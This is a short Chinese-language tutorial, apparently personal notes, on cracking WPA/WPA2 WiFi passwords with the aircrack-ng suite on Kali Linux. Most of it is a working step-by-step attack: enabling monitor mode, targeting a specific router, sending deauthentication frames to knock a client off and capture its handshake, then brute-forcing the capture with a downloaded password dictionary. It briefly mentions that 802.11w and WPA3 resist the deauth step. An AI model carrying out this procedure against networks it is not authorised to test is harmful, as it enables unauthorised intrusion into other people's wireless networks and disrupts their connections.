加密类型

wep:不用了

wpa:抓包破解

wps：跑pin码破解

参考文章：你们家用的无线路由器安全吗？【转载+防爆破经验分享】 - 『精品软件区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

工具aircrack-ng&WPA

kali自带

命令

查看可用的无线网卡
airmon-ng
激活无线网卡至monitor即监听模式
airmon-ng start wlan0
获取当前网络概况
airodump-ng wlan0mon
使用参数过滤扫描列表，确定扫描目标
airodump-ng -c 6 -w airodump --bssid 80:8F:1D:34:48:34 wlan0mon
直到抓到握手包

握手包：连接wifi时会发送的数据包

看到正常客户端mac之后另开命令行

使用 aireplay-ng 对正常客户端发起取消认证攻击加速获取握手包：

正常客户端断开与wifi的连接，使其再次连接然后获取握手包，直到上一条命令窗口获取到握手包，ctrl c结束这条命令

注意：有些路由器支持802.11w协议，802.11w协议加密了管理数据帧，从而使得WIFI免受Deauth攻击的破坏，那就只能等待正常客户端自己连接wifi了，wpa3协议也可以免受攻击

aireplay-ng -0 9 -a 80:8F:1D:34:48:34 -c 42:B7:D9:6C:3A:F3 wlan0mon

参数解释

• 0：采用Deauth攻击模式，后面紧跟攻击次数，这里设置为9，大家可以根据实际情况设置
• -a：后面跟AP的mac地址
• -c：后面跟客户端的mac地址

开始破解WPA
aircrack-ng -w ./wpa-dictionary/common.txt ./airodump-01.cap
停止监听
airmon-ng stop wlan0mon

术语含义

第一个列表表示扫描到的无线网络 AP 信息，会用到以下几列信息：
BSSID: 无线 AP 的硬件地址
PWR: 信号强度，值是负数，绝对值越小表示信号越强
CH: 无线网络信道
ENC: 加密方式，我们要破解的是 WPA2
ESSID: 无线网络的名称

第二个列表表示某个无线网络中和用户设备的连接信息：
BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址

密码字典

conwnet/wpa-dictionary: WPA/WPA2 密码字典，用于 wifi 密码暴力破解 (github.com)

参考资料

aircrack-ng 使用 - 知乎 (zhihu.com)

conwnet/wpa-dictionary: WPA/WPA2 密码字典，用于 wifi 密码暴力破解 (github.com)